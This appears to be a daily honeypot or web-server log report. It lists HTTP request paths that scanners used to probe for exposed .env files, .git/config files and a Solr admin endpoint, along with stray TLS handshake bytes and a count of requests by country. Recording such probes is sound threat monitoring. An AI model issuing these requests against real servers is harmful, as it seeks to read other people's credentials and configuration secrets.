2221GET /.env.template HTTP/1.1
2231GET /.env_sample HTTP/1.1
2241GET /project/.git/config HTTP/1.1
2251\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\x00\x0EOf7\x82\x0FI\x00\xEA \xE7\xAA@\xC6\xF9u\xAD\x0B\xC4\x90B\xA9\xEE\xEFk\x92\xFCYkxK \x89`86=lH\x97\xF4\xA8\x10\xE5\x15\xE5t\xE1\xF3\x02\x96\xAE!(p2\xD6Ga\xFC(\x1E\xE2\x1B\x00&\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x09\xC0\x13\xC0
2261GET /Module1/Home.html HTTP/1.1
2271GET /build/.env HTTP/1.1
2281GET /.env.production.local HTTP/1.1
2291GET /config.json HTTP/1.1
2301GET /.env.test HTTP/1.1
2311GET /backup/.git/config HTTP/1.1
2321GET /.env.default HTTP/1.1
2331GET /.env.development.local HTTP/1.1
2341GET /api/.git/config HTTP/1.1
2351GET /src/.git/config HTTP/1.1
2361GET /.env.dev HTTP/1.1
2371GET /.env.dist HTTP/1.1
2381GET /.env.preprod HTTP/1.1
2391GET /cms/.git/config HTTP/1.1
2401GET /.env.local HTTP/1.1
2411GET /.env.stage HTTP/1.1
2421GET /config/.env HTTP/1.1
2431GET /.env.testing HTTP/1.1
2441GET /.env.bak HTTP/1.1
2451GET /settings/.env HTTP/1.1
2461GET /core/.git/config HTTP/1.1
2471GET /admin/.git/config HTTP/1.1
2481GET /app/.git/config HTTP/1.1
2491GET /config/.git/config HTTP/1.1
2501GET /files/.git/config HTTP/1.1
2511GET /data/.git/config HTTP/1.1
2521GET /public/.git/config HTTP/1.1
2531GET /.env.save HTTP/1.1
2541GET /.env.sandbox HTTP/1.1
2551GET /.env.uat HTTP/1.1
2561GET /media/.git/config HTTP/1.1
2571GET /solr/admin/info/system?wt=json HTTP/1.1
2581\x16\x03\x01\x00\xAC\x01\x00\x00\xA8\x03\x03\xD4\x16\x08z\x97\xCF\xA5\xE0\xB4(\xA6\xB4\x8D3\xB7\xF2\xAEAae\x9ES\x19I\xFC\x14*-\x8D\xC6\x1F-\x00\x008\xC0,\xC0

country_iso_code
#

number_of_occurencecountry_iso_code
0253US
1228NL
2108BR
358DE
447MX
546FR
628AR
726RU
823PL
920CN
1011CH
118HK
128TW
135BG
143GB
152RO
161KH
171EE
181EG
191SE
201BE
211PK

Related

Report: 2025-03-08
·2592 words
Repport Daily
Report: 2025-03-07
·4103 words
Repport Daily
Report: 2025-03-06
·3457 words
Repport Daily